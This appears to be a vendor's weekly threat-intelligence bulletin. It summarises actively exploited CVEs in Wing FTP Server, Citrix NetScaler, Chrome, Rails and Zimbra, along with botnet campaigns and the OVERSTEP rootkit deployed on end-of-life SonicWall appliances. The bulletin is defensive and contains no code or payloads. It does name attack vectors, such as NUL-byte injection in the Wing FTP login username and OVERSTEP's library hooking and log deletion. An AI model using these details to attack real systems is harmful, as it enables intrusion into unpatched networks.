This week in cybersecurity, the threat landscape reflected a surge in exploitation activity and targeted attacks on vulnerable systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added one new vulnerability to its Known Exploited Vulnerabilities (KEV) catalog - a critical flaw in Wing FTP Server. Meanwhile, active exploitation persists across widely used platforms including Google Chrome, Citrix NetScaler ADC and Gateway, PHPMailer, Ruby on Rails, and Zimbra Collaboration Suite, signaling attackers continued focus on popular enterprise technologies.  

Botnet activity intensified as multiple families expanded their campaigns. Threat actors behind EnemyBot, Sysrv-k, Andoryu, and Androxgh0st actively scanned for and exploited unpatched flaws in GitLab, Cloud Gateway, and other PHP-based services. Simultaneously, IoT-focused botnets such as Bashlite, BrickerBot, Tsunami, and Mirai ramped up widespread attacks on exposed systems, especially targeting vulnerable Eir D1000 devices, leading to rapid compromise across networks.

In parallel, Google’s Threat Intelligence Group (GTIG) attributed a stealthy intrusion campaign to UNC6148, a threat actor targeting end-of-life SonicWall SMA 100 series appliances. The group deployed a novel malware called OVERSTEP, a user-mode rootkit that alters the boot process, enables credential theft, and ensures long-term persistence. The campaign highlights the continued risk from legacy devices and the use of stolen credentials and anti-forensic techniques to maintain access even post-patching.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-47812
An Improper Neutralization of Null Byte (NUL) Vulnerability in the Wing FTP Server allows for remote code execution by injecting arbitrary Lua code into user session files. With a critical CVSS Score of 10.0, this flaw stems from improper handling of the username parameter in the /loginok.html endpoint, as discovered by researchers at RCE security. Attackers can exploit this flaw by injecting NULL bytes, which the server fails to sanitize properly. Because Wing FTP relies on Lua as its internal scripting engine, this opens door for arbitrary system command execution under root or SYSTEM privileges. A proof-of-concept (PoC) is publicly available, and the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The issue has been patched in version 7.4.4, and immediate upgrading is strongly recommended.  

CVE-2025-5777
An Out-of-Bounds Read Vulnerability in the Citrix NetScaler ADC and Gateway has raised critical security concerns, earning a CVSS Score of 9.3. Now informally dubbed " Citrix Bleed 2", this flaw arises from insufficient input validation, potentially enabling threat actors to exfiltrate sensitive information or gain unauthorized access to affected systems. A publicly available proof-of-concept (PoC) has further escalated the urgency of this issue. Its recent addition to the CISA Known Exploited Vulnerabilities (KEV) catalog highlights ongoing exploitation in the wild. Organizations using vulnerable versions are strongly advised to apply the latest patches without delay to mitigate the risk of compromise.

CVE-2025-6558
An Improper Input Validation Vulnerability in Google Chrome allows remote attackers to escape the browser sandbox using a specially crafted HTML page. Discovered by Google's Threat Analysis Group, the vulnerability affects Chrome's ANGLE (Almost Native Graphics Layer Engine) and GPU components, where untrusted input isn't properly validated. Since ANGLE translates the WebGL and other graphics API calls to native system instructions, a flaw in this layer creates a critical attack vector potentially allowing attackers to manipulate the rendering process and execute arbitrary code. Google has confirmed that this vulnerability is actively exploited in the wild. A stable channel update has been released for Chrome version 138.0.7204.157/.158 on Windows, Mac, and Linux, with automatic rollout currently underway. Users are strongly urged to update immediately to stay protected.

CVE-2019-5418
A Path Traversal Vulnerability in the Ruby on Rails' Action View component has been added to the CISA KEV catalog, signaling confirmed in-the-wild exploitation. Rated with a high CVSS Score of 7.5, this flaw allows attackers to manipulate file paths and potentially access arbitrary files on the system. Originally addressed in March 2019, the issue was patched across multiple Rails versions, including 4.2.11.1, 5.0.7.2, 5.1.6.2, 5.2.2.1, and 6.0.0.beta3 and later. With proof-of-concept code publicly available, the renewed attention underscores the importance of applying long-standing patches, especially for legacy systems still relying on older Rails deployments.

CVE-2019-9621
A Server-Side Request Forgery (SSRF) Vulnerability in the ProxyServlet component of Synacor's Zimbra Collaboration Suite has been recently added to the CISA KEV catalog, highlighting ongoing exploitation activity. With a high CVSS Score of 7.5, this flaw allows attackers to manipulate Zimbra servers into making unauthorized requests to internal or external systems, potentially leading to sensitive data exposure or remote code exposure. Zimbra addressed the issue through multiple patch releases, including 8.7.11 Patch 11, 8.8.9 Patch10, 8.8.10 Patch8, 8.8.11 Patch4, and the full release of 8.8.12 in April 2019. This vulnerability gained notable attention in September 2023 when Trend Micro linked its exploitation to the China-based threat group Earth Lusca, further emphasizing the threat's real-world impact.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

UNC6148 Deploys OVERSTEP Rootkit via EoL SonicWall Exploitation

A sophisticated threat campaign has been observed targeting end-of-life SonicWall SMA 100 series appliances, culminating in the deployment of a stealthy backdoor dubbed OVERSTEP. Attributed to threat actor UNC6148 by Google's Threat Intelligence Group (GTIG), the campaign exploits stolen credentials and OTP seeds from past intrusions to regain access even after patching. While the exact initial access vector remains unknown, exploitation of known vulnerabilities - CVE-2025-32819, CVE-2024-38475, CVE-2021-20035, CVE-2021-20038 and CVE-2021-20039 or the use of a potential zero-day flaw is suspected.  

Once access is gained, attackers establish SSL-VPN sessions and spawn a reverse shell, possibly using a previously undocumented methods, as shell access isn't normally permitted on these appliances. OVERSTEP modifies the boot process for persistence, implements a usermode rootkit by hijacking standard library functions (open, readdir, write), and facilities credential theft and remote command execution via web requests. It also deletes key log entries to evade detection.  

UNC6148's tactics demonstrate increasing exploitation of edge devices beyond the reach of traditional security solutions, with implications for data theft, extortion, and potential ransomware deployment.  

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/07/14/cisa-adds-one-known-exploited-vulnerability-catalog
2. https://www.cisa.gov/news-events/alerts/2025/07/14/cisa-adds-one-known-exploited-vulnerability-catalog
3. https://chromereleases.googleblog.com/2025/07/stable-channel-update-for-desktop_15.html
4. https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-adds-one-known-exploited-vulnerability-catalog
5. https://thehackernews.com/2025/07/urgent-google-releases-critical-chrome.html
6. https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor